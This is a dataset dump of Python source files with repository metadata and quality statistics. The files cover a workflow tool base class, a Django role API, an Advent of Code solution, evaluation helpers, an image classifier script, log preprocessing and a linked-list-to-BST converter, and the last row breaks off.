hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e9782a8f7459b65fce4ad645e6b56ab9d0f6103d
| 2,144
|
py
|
Python
|
gladier/base.py
|
globus-labs/gladier_tools
|
0dc4a23af81a2355a908b9a9026f0e68a527c6dc
|
[
"Apache-2.0"
] | 1
|
2020-08-25T20:20:18.000Z
|
2020-08-25T20:20:18.000Z
|
gladier/base.py
|
globus-labs/gladier_tools
|
0dc4a23af81a2355a908b9a9026f0e68a527c6dc
|
[
"Apache-2.0"
] | null | null | null |
gladier/base.py
|
globus-labs/gladier_tools
|
0dc4a23af81a2355a908b9a9026f0e68a527c6dc
|
[
"Apache-2.0"
] | null | null | null |
class GladierBaseTool(object):
    """Gladier Defaults defines a common method of tying together
    flows, funcx-functions, and default inputs for starting a flow.

    Subclasses override the class attributes below.  An optional *alias*
    (together with an *alias_class* renamer) rewrites the tool's input
    variable names so the same tool can be used more than once in a flow.
    """

    # Flow definition for this tool; subclasses override.
    flow_definition = None
    # Default values fed into the flow.
    flow_input = dict()
    # Input names the caller must supply.
    required_input = []
    # Inputs that are never renamed by an alias.
    alias_exempt = ['funcx_endpoint_compute', 'funcx_endpoint_non_compute']
    funcx_endpoints = dict()
    funcx_functions = []

    def __init__(self, alias=None, alias_class=None):
        """Store *alias* and instantiate the renamer.

        Raises:
            ValueError: when *alias* is given without an *alias_class*.
        """
        self.alias = alias
        if alias and not alias_class:
            raise ValueError(
                f'{self.__class__.__name__} given alias "{alias}" but not "alias_class". '
                'ex: alias_class=gladier.utils.tool_alias.StateSuffixVariablePrefix'
            )
        if alias_class:
            # The original copied alias_class into a redundant local
            # (alias_cls) first; instantiate it directly instead.
            self.alias_renamer = alias_class(alias)

    def get_required_input(self):
        """Return required input names, renamed under the alias when one is set."""
        if not self.alias:
            return self.required_input
        return [
            var if var in self.alias_exempt
            else self.alias_renamer.rename_variable(var, self)
            for var in self.required_input
        ]

    def get_flow_input(self):
        """Return default flow input, with non-exempt keys renamed under the alias."""
        if not self.alias:
            return self.flow_input
        return {
            (key if key in self.alias_exempt
             else self.alias_renamer.rename_variable(key, self)): val
            for key, val in self.flow_input.items()
        }

    def get_original_inputs(self):
        """Return all non-exempt input names (required + defaults), un-renamed."""
        return [input_var
                for input_var in set(self.required_input) | set(self.flow_input.keys())
                if input_var not in self.alias_exempt]

    def rename_state(self, state_name, state_data):
        """Rename one flow state and its input variables under the alias."""
        name = self.alias_renamer.rename_state(state_name, self)
        data = self.alias_renamer.rename_input_variables(
            state_data, self.get_original_inputs(), self)
        return name, data
| 37.614035
| 97
| 0.615672
| 257
| 2,144
| 4.828794
| 0.252918
| 0.087027
| 0.064464
| 0.070911
| 0.183723
| 0.14021
| 0.14021
| 0.14021
| 0
| 0
| 0
| 0
| 0.307369
| 2,144
| 56
| 98
| 38.285714
| 0.83569
| 0.056903
| 0
| 0.152174
| 0
| 0
| 0.09204
| 0.067164
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0
| 0.021739
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e97c7053b712437ddd9adb3801c6bf654177920e
| 2,717
|
py
|
Python
|
PersonManage/role/views.py
|
ahriknow/ahriknow
|
817b5670c964e01ffe19ed182ce0a7b42e17ce09
|
[
"MIT"
] | null | null | null |
PersonManage/role/views.py
|
ahriknow/ahriknow
|
817b5670c964e01ffe19ed182ce0a7b42e17ce09
|
[
"MIT"
] | 3
|
2021-03-19T01:28:43.000Z
|
2021-04-08T19:57:19.000Z
|
PersonManage/role/views.py
|
ahriknow/ahriknow
|
817b5670c964e01ffe19ed182ce0a7b42e17ce09
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from redis import StrictRedis
from rest_framework.response import Response
from rest_framework.views import APIView
from PersonManage.role.models import Role
from PersonManage.role.serializer import OneRole, ManyRole
from PersonManage.jurisdiction.models import Jurisdiction
class RoleView(APIView):
    """CRUD endpoints for Role objects.

    Every response body uses the shape {'code': ..., 'msg': ..., 'data': ...}.
    """

    def get(self, request, id=None):
        """Return one role by primary key, or the full role list."""
        if id:
            if role := Role.objects.filter(pk=id).first():
                data = OneRole(instance=role, many=False).data
                return Response({'code': 200, 'msg': 'Query was successful!', 'data': data})
            return Response({'code': 400, 'msg': 'Data does not exist!', 'data': None})
        else:
            roles = Role.objects.all()
            data = ManyRole(instance=roles, many=True).data
            return Response({'code': 200, 'msg': 'Query was successful!', 'data': data})

    def post(self, request):
        """Create a role from the request's 'name' and 'describe' fields."""
        try:
            role = Role(name=request.data['name'], describe=request.data['describe'])
            role.save()
            return Response({'code': 200, 'msg': 'Create successful!', 'data': None})
        except Exception as ex:
            # Backend-specific duplicate detection (matches SQLite/MySQL
            # constraint wording); kept for compatibility.
            if 'UNIQUE' in str(ex):
                return Response({'code': 400, 'msg': 'Data duplication!', 'data': None})
            return Response({'code': 500, 'msg': str(ex), 'data': None})

    def put(self, request, id=None):
        """Update name/describe and, if given, replace the jurisdiction set."""
        if role := Role.objects.filter(pk=id).first():
            data = request.data
            if name := data.get('name'):
                role.name = name
            if describe := data.get('describe'):
                role.describe = describe
            if 'jurisdictions' in data:
                # Permissions changed: flush the redis cache database.
                redis = StrictRedis(host=settings.DATABASES['redis']['HOST'],
                                    port=settings.DATABASES['redis']['PORT'],
                                    db=settings.DATABASES['redis']['NAME_2'],
                                    password=settings.DATABASES['redis']['PASS'])
                redis.flushdb()
                role.jurisdictions.clear()
                for jur_id in data['jurisdictions']:
                    jur = Jurisdiction.objects.filter(pk=jur_id).first()
                    # Fix: skip unknown ids instead of adding None to the
                    # many-to-many relation.
                    if jur is not None:
                        role.jurisdictions.add(jur)
            role.save()
            return Response({'code': 200, 'msg': 'Update successful!', 'data': None})
        return Response({'code': 400, 'msg': 'Data does not exist!', 'data': None})

    def delete(self, request, id=None):
        """Delete the role with the given primary key."""
        if role := Role.objects.filter(pk=id).first():
            role.delete()
            # Fix: include 'data' for consistency with every other response.
            return Response({'code': 200, 'msg': 'Delete successful!', 'data': None})
        return Response({'code': 400, 'msg': 'Data does not exist!', 'data': None})
| 46.844828
| 92
| 0.560177
| 299
| 2,717
| 5.080268
| 0.277592
| 0.092166
| 0.118499
| 0.069124
| 0.368005
| 0.317314
| 0.298881
| 0.256748
| 0.256748
| 0.230415
| 0
| 0.016196
| 0.295547
| 2,717
| 57
| 93
| 47.666667
| 0.777429
| 0
| 0
| 0.192308
| 0
| 0
| 0.137284
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0.019231
| 0.134615
| 0
| 0.423077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e98066a2b0d3ed3bbd8dc11131cf9f11efdf134a
| 3,645
|
py
|
Python
|
advent-of-code-2019/day 12/main.py
|
gikf/advent-of-code
|
923b026ce87121b73093554734746c2ecb17c5e2
|
[
"MIT"
] | null | null | null |
advent-of-code-2019/day 12/main.py
|
gikf/advent-of-code
|
923b026ce87121b73093554734746c2ecb17c5e2
|
[
"MIT"
] | null | null | null |
advent-of-code-2019/day 12/main.py
|
gikf/advent-of-code
|
923b026ce87121b73093554734746c2ecb17c5e2
|
[
"MIT"
] | null | null | null |
"""Advent of Code 2019 Day 12."""
from functools import lru_cache
import re
def main(file_input='input.txt'):
    """Solve both parts of AoC 2019 day 12 and print the answers."""
    raw_lines = get_file_contents(file_input)
    moons = parse_moons([raw.strip() for raw in raw_lines])

    # Part 1: total energy after exactly 1000 simulation steps.
    total_energy = find_total_energy(simulate_steps(moons, 1000))
    print(f'Total energy after 1000 steps: {total_energy}')

    # Part 2: LCM of the three per-axis cycle lengths.
    cycles = simulate_steps(moons)
    *two_cycles, last_cycle = cycles.values()
    steps_to_repeat = int(lcm(lcm(*two_cycles), last_cycle))
    print(f'Steps to reach first repeating state: {steps_to_repeat}')
def simulate_steps(moons, steps=None):
    """Advance the moon system step by step.

    With *steps* given, return the moon states after that many steps.
    With *steps* falsy, run until every axis returns to its initial
    state and return a dict mapping axis index -> cycle length.
    """
    initial_moons = moons
    cycles = {}
    step_count = 0
    while not steps or step_count < steps:
        step_count += 1
        moons = moon_motion(moons)
        if steps:
            continue
        # Cycle-detection mode: record the first step each axis repeats.
        for axis in (0, 1, 2):
            if axis not in cycles and is_cycle(moons, initial_moons, axis):
                cycles[axis] = step_count
        if len(cycles) == 3:
            return cycles
    return moons
def is_cycle(moons, initial, axis):
    """Return True when every moon matches its initial position and
    velocity along *axis*."""
    return all(
        now['position'][axis] == start['position'][axis]
        and now['velocity'][axis] == start['velocity'][axis]
        for now, start in zip(moons, initial)
    )
def moon_motion(initial_moons):
    """Advance every moon by one step: apply pairwise gravity to the
    velocities, then move each moon by its new velocity."""
    updated = []
    for moon in initial_moons:
        velocity = moon['velocity']
        for other in initial_moons:
            # Skip self (and any moon with an identical state — the pull
            # between equal positions is zero anyway).
            if moon == other:
                continue
            pull = join_with_function(
                gravity_effect, moon['position'], other['position'])
            velocity = join_with_function(int.__add__, velocity, pull)
        position = join_with_function(int.__add__, moon['position'], velocity)
        updated.append({
            'position': position,
            'velocity': velocity,
        })
    return updated


def join_with_function(func, values1, values2):
    """Combine two sequences element-wise with *func*."""
    return [func(left, right) for left, right in zip(values1, values2)]


def gravity_effect(position, other_position):
    """Return -1/0/+1: the pull *other_position* exerts on *position*."""
    if position < other_position:
        return 1
    if position > other_position:
        return -1
    return 0
def find_total_energy(moons):
    """Total energy of the system: sum over moons of potential
    (|position| components) times kinetic (|velocity| components)."""
    total = 0
    for moon in moons:
        total += get_energy(moon['position']) * get_energy(moon['velocity'])
    return total


def get_energy(values):
    """Sum of absolute values — one moon's potential or kinetic energy."""
    return sum(map(abs, values))
def parse_moons(lines):
    """Parse input lines like '<x=-1, y=0, z=2>' into moon dicts with a
    three-component position and a zero velocity."""
    number_pattern = re.compile(r'([-\d]+)')
    return [
        {
            'position': [int(num) for num in number_pattern.findall(line)],
            'velocity': [0, 0, 0],
        }
        for line in lines
    ]
@lru_cache()
def lcm(a, b):
    """Least common multiple of two integers.

    Fix: use integer floor division instead of true division.  The
    original `abs(a * b) / gcd(a, b)` produced a float, which silently
    loses precision once a*b exceeds 2**53 — exactly the magnitude this
    puzzle's combined cycle lengths reach.  The result now stays an
    exact int (callers that wrap it in int() are unaffected).
    """
    return abs(a * b) // gcd(a, b)


@lru_cache()
def gcd(a, b):
    """Greatest common divisor via Euclid's algorithm."""
    if b == 0:
        return a
    return gcd(b, a % b)
def get_file_contents(file):
    """Return every line of *file* (newlines preserved) as a list."""
    with open(file) as handle:
        return list(handle)
# Script entry point: run the day-12 solver only when executed directly.
if __name__ == '__main__':
    main()
| 27.201493
| 74
| 0.608505
| 465
| 3,645
| 4.589247
| 0.268817
| 0.030928
| 0.029991
| 0.037957
| 0.020619
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012548
| 0.278464
| 3,645
| 133
| 75
| 27.406015
| 0.798859
| 0.131962
| 0
| 0.152174
| 0
| 0
| 0.076575
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.021739
| 0
| 0.326087
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e987a8021b1287256296f2282748c6e9f81dfd63
| 767
|
py
|
Python
|
ntcir15_tools/eval/__init__.py
|
longpham28/ntcir15_tools
|
d5fd138a3c90dfd2c5a67ea908101fed5563484d
|
[
"MIT"
] | null | null | null |
ntcir15_tools/eval/__init__.py
|
longpham28/ntcir15_tools
|
d5fd138a3c90dfd2c5a67ea908101fed5563484d
|
[
"MIT"
] | null | null | null |
ntcir15_tools/eval/__init__.py
|
longpham28/ntcir15_tools
|
d5fd138a3c90dfd2c5a67ea908101fed5563484d
|
[
"MIT"
] | null | null | null |
import numpy as np
from pyNTCIREVAL import Labeler
from pyNTCIREVAL.metrics import MSnDCG
from collections import defaultdict
from ntcir15_tools.data import en_query_ids, ja_query_ids, en_labels, ja_labels
def get_rel_level(text):
    """Map a relevance label ("L0"/"L1"/"L2") to its integer level.

    Unknown labels fall back to 0, matching the original if-chain.
    """
    levels = {"L0": 0, "L1": 1, "L2": 2}
    return levels.get(text, 0)
def get_qrels(query_id):
    """Build {col_id: relevance_level} for *query_id*.

    The language is taken from the second dash-separated field of the
    id ("E" selects the English label table, anything else Japanese).
    Labels are filtered from the (presumably numpy) label array whose
    first column holds query ids.
    """
    lang = query_id.split("-")[1]
    assert query_id in en_query_ids or query_id in ja_query_ids, "not valid query_id"
    labels = en_labels if lang == "E" else ja_labels
    rows = labels[labels[:, 0] == query_id][:, 1:]
    return {col_id: get_rel_level(text) for col_id, text in rows}
| 24.741935
| 85
| 0.647979
| 117
| 767
| 4.025641
| 0.401709
| 0.089172
| 0.042463
| 0.063694
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021127
| 0.259452
| 767
| 30
| 86
| 25.566667
| 0.808099
| 0
| 0
| 0.076923
| 0
| 0
| 0.033898
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 1
| 0.076923
| false
| 0
| 0.192308
| 0
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9895372814e45f43f516d5ef779aac132b10fc9
| 2,145
|
py
|
Python
|
notebooks/Detecting Covid-19 through Transfer Learning/src/test.py
|
supria68/Data-Science-Projects
|
423695c130a92db1a188b3d3a13871f0f76f6f5b
|
[
"MIT"
] | 2
|
2020-09-16T19:37:30.000Z
|
2021-11-01T17:49:36.000Z
|
notebooks/Detecting Covid-19 through Transfer Learning/src/test.py
|
supria68/Data-Science-Projects
|
423695c130a92db1a188b3d3a13871f0f76f6f5b
|
[
"MIT"
] | null | null | null |
notebooks/Detecting Covid-19 through Transfer Learning/src/test.py
|
supria68/Data-Science-Projects
|
423695c130a92db1a188b3d3a13871f0f76f6f5b
|
[
"MIT"
] | 1
|
2021-11-01T17:49:37.000Z
|
2021-11-01T17:49:37.000Z
|
"""
filename: test.py
author: Supriya Sudarshan
version: 19.04.2021
description: Takes in the images and predicts (Covid or Non-Covid/Normal) using the *.h5 models
"""
import numpy as np
import matplotlib.pyplot as plt
import os
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.vgg19 import preprocess_input
import random
def evaluate(img_path, model):
    """
    Given the image path and model, preprocess the input image and get
    predictions
    """
    # Load and preprocess: 224x224, batch axis, VGG19 preprocessing.
    loaded = image.load_img(img_path, target_size=(224, 224))
    batch = np.expand_dims(image.img_to_array(loaded), axis=0)
    image_data = preprocess_input(batch)

    # First output unit is treated as P(COVID).
    covid_prob = model.predict(image_data)[0][0]
    if covid_prob > 0.5:
        prediction = str('%.2f' % (covid_prob * 100) + '% COVID')
    else:
        prediction = str('%.2f' % ((1 - covid_prob) * 100) + '% Normal')

    plt.title(prediction)
    plt.imshow(loaded)
    plt.show()
if __name__ == "__main__":
    # Load appropriate models
    ct_model = load_model('../saved_models/chest_ct_vggmodel.h5')
    xray_model = load_model('../saved_models/chest_xray_vggmodel.h5')
    ultrasound_model = load_model('../saved_models/ultrasound_vggmodel.h5')

    def _random_image(directory):
        """Pick a random file name from *directory*."""
        return random.choice([f for f in os.listdir(directory)
                              if os.path.isfile(os.path.join(directory, f))])

    # Fix: the original repeated the same scrape/predict stanza three
    # times.  One (subdirectory, display label, model) triple per
    # modality; labels reproduce the original messages exactly
    # (including lowercase 'ultrasound').
    cases = [
        ('CT', 'CT', ct_model),
        ('Xray', 'Xray', xray_model),
        ('Ultrasound', 'ultrasound', ultrasound_model),
    ]
    for subdir, label, model in cases:
        path = '../images_for_testing/' + subdir
        img = _random_image(path)
        print('\nPreparing to predict for a {} image: {}'.format(label, img))
        evaluate(path + '/' + img, model)
| 32.014925
| 97
| 0.674592
| 303
| 2,145
| 4.627063
| 0.316832
| 0.025678
| 0.040656
| 0.040656
| 0.319544
| 0.301712
| 0.196862
| 0.196862
| 0.196862
| 0.196862
| 0
| 0.020583
| 0.184615
| 2,145
| 66
| 98
| 32.5
| 0.781018
| 0.149184
| 0
| 0.081081
| 0
| 0
| 0.202468
| 0.108805
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.189189
| 0
| 0.216216
| 0.081081
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e98cb6485313bf23d0ef3116dfc0e309cd633aad
| 3,064
|
py
|
Python
|
preprocess/utils.py
|
federicozaiter/LogClass
|
62c1c9c61294625bdb3d99dc01b6adc7b735c4ab
|
[
"MIT"
] | 159
|
2020-02-19T00:19:23.000Z
|
2022-03-30T08:40:08.000Z
|
preprocess/utils.py
|
WeibinMeng/LogClass-1
|
8edbaf4377374e2aac5e7057987e1d047b83ff2f
|
[
"MIT"
] | 3
|
2021-06-09T04:30:35.000Z
|
2022-01-09T23:26:07.000Z
|
preprocess/utils.py
|
WeibinMeng/LogClass-1
|
8edbaf4377374e2aac5e7057987e1d047b83ff2f
|
[
"MIT"
] | 41
|
2020-02-19T00:19:26.000Z
|
2022-03-28T08:02:22.000Z
|
import re
import numpy as np
from tqdm import tqdm
from ..decorators import print_step
from multiprocessing import Pool
# Compiling for optimization — patterns hoisted to module level so the
# hot path in remove_parameters never recompiles.
re_sub_1 = re.compile(r"(:(?=\s))|((?<=\s):)")
re_sub_2 = re.compile(r"(\d+\.)+\d+")
re_sub_3 = re.compile(r"\d{2}:\d{2}:\d{2}")
re_sub_4 = re.compile(r"Mar|Apr|Dec|Jan|Feb|Nov|Oct|May|Jun|Jul|Aug|Sep")
re_sub_5 = re.compile(r":?(\w+:)+")
re_sub_6 = re.compile(r"\.|\(|\)|\<|\>|\/|\-|\=|\[|\]")
p = re.compile(r"[^(A-Za-z)]")


def remove_parameters(msg):
    """Strip parameter-like text (dangling colons, dotted numbers,
    timestamps, month names, key:value prefixes, punctuation) from a log
    message, keeping only tokens made purely of letters."""
    for pattern in (re_sub_1, re_sub_2, re_sub_3, re_sub_4, re_sub_5):
        msg = pattern.sub("", msg)
    msg = re_sub_6.sub(" ", msg)
    # Filtering strings that have non-letter tokens
    letter_tokens = [tok for tok in msg.split() if not p.search(tok)]
    return " ".join(letter_tokens)
def remove_parameters_slower(msg):
    """Same cleanup as remove_parameters, but compiling every regex on
    each call (kept as the slower reference implementation)."""
    substitutions = (
        (r"(:(?=\s))|((?<=\s):)", ""),
        (r"(\d+\.)+\d+", ""),
        (r"\d{2}:\d{2}:\d{2}", ""),
        (r"Mar|Apr|Dec|Jan|Feb|Nov|Oct|May|Jun|Jul|Aug|Sep", ""),
        (r":?(\w+:)+", ""),
        (r"\.|\(|\)|\<|\>|\/|\-|\=|\[|\]", " "),
    )
    for pattern, replacement in substitutions:
        msg = re.sub(pattern, replacement, msg)
    # Filtering strings that have non-letter tokens
    checker = re.compile("[^(A-Za-z)]")
    return " ".join(tok for tok in msg.split() if not checker.search(tok))
@print_step
def process_logs(input_source, output, process_line=None):
    """Apply *process_line* to every line of *input_source* in parallel
    and write the results to *output*.

    Lines are fanned out to a multiprocessing Pool with imap, so result
    order matches input order.  Both files use latin-1 to tolerate
    arbitrary byte values in raw logs.
    """
    with open(output, "w", encoding='latin-1') as f:
        # counting first to show progress with tqdm
        with open(input_source, 'r', encoding='latin-1') as IN:
            line_count = sum(1 for line in IN)
        # Re-open to restart iteration from the beginning.
        with open(input_source, 'r', encoding='latin-1') as IN:
            with Pool() as pool:
                # Large chunksize amortizes IPC overhead per worker batch.
                results = pool.imap(process_line, IN, chunksize=10000)
                f.writelines(tqdm(results, total=line_count))
@print_step
def load_logs(params, ignore_unlabeled=False):
    """Load "<label> <tokens...>" log lines from params['logs'].

    Returns (x_data, y_data, target_names): message strings, numeric
    label ids, and the list of labeled class names.  The healthy label
    (params['healthy_label']) maps to -1.0; with ignore_unlabeled=True
    its lines are skipped entirely.

    NOTE(review): when the healthy label is present, len(label_dict)
    counts its -1.0 entry, so labeled classes start at id 1 while
    target_names starts at index 0 — confirm downstream indexing
    expects this offset.
    """
    log_path = params['logs']
    unlabel_label = params['healthy_label']
    x_data = []
    y_data = []
    label_dict = {}
    target_names = []
    with open(log_path, 'r', encoding='latin-1') as IN:
        line_count = sum(1 for line in IN)
    with open(log_path, 'r', encoding='latin-1') as IN:
        for line in tqdm(IN, total=line_count):
            tokens = line.strip().split()
            label = tokens[0]
            if label not in label_dict:
                if ignore_unlabeled and label == unlabel_label:
                    continue
                if label == unlabel_label:
                    label_dict[label] = -1.0
                else:
                    # Fix: the original guarded this branch with
                    # `elif label not in label_dict`, which is always
                    # true inside the outer `not in` check — plain else.
                    label_dict[label] = len(label_dict)
                    target_names.append(label)
            x_data.append(" ".join(tokens[1:]))
            y_data.append(label_dict[label])
    x_data = np.array(x_data)
    y_data = np.array(y_data)
    return x_data, y_data, target_names
| 35.627907
| 77
| 0.568864
| 475
| 3,064
| 3.513684
| 0.244211
| 0.071899
| 0.057519
| 0.065908
| 0.4284
| 0.381067
| 0.318754
| 0.310365
| 0.264829
| 0.264829
| 0
| 0.014731
| 0.246736
| 3,064
| 85
| 78
| 36.047059
| 0.708406
| 0.072454
| 0
| 0.225352
| 0
| 0.028169
| 0.123457
| 0.053616
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056338
| false
| 0
| 0.070423
| 0
| 0.169014
| 0.042254
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e991e9f5f0c1bdfb1e7229e0942eed1c870966c6
| 1,478
|
py
|
Python
|
gfg/trees/sorted_ll_to_bst.py
|
rrwt/daily-coding-challenge
|
b16fc365fd142ebab429e605cb146c8bb0bc97a2
|
[
"MIT"
] | 1
|
2019-04-18T03:29:02.000Z
|
2019-04-18T03:29:02.000Z
|
gfg/trees/sorted_ll_to_bst.py
|
rrwt/daily-coding-challenge
|
b16fc365fd142ebab429e605cb146c8bb0bc97a2
|
[
"MIT"
] | null | null | null |
gfg/trees/sorted_ll_to_bst.py
|
rrwt/daily-coding-challenge
|
b16fc365fd142ebab429e605cb146c8bb0bc97a2
|
[
"MIT"
] | null | null | null |
"""
Given a Singly Linked List which has data members sorted in ascending order.
Construct a Balanced Binary Search Tree which has same data members as the given Linked List.
"""
from typing import Optional
from binary_tree_node import Node # type: ignore
from tree_traversal import inorder # type: ignore
class LLNode:
    """A singly-linked-list node holding an integer payload."""

    def __init__(self, data: int):
        self.data = data
        # Successor node; None marks the end of the list.
        self.next: Optional['LLNode'] = None
def ll_size(head: 'Optional[LLNode]') -> int:
    """Count the nodes of the singly linked list starting at *head*."""
    count = 0
    node = head
    while node:
        node = node.next
        count += 1
    return count
def sorted_ll_to_bst(head: 'Optional[LLNode]') -> 'Optional[Node]':
    """Build a height-balanced BST from an ascending-sorted linked list.

    Consumes the list in order while recursing (simulated inorder
    construction), so the whole conversion runs in O(n).
    """
    def build(count: int) -> 'Optional[Node]':
        nonlocal head
        if head is None or count == 0:
            return None
        # Build the left subtree first so `head` is the inorder successor.
        left_subtree = build(count // 2)
        node = Node(head.data)
        head = head.next
        node.left = left_subtree
        node.right = build(count - count // 2 - 1)
        return node

    return build(ll_size(head))
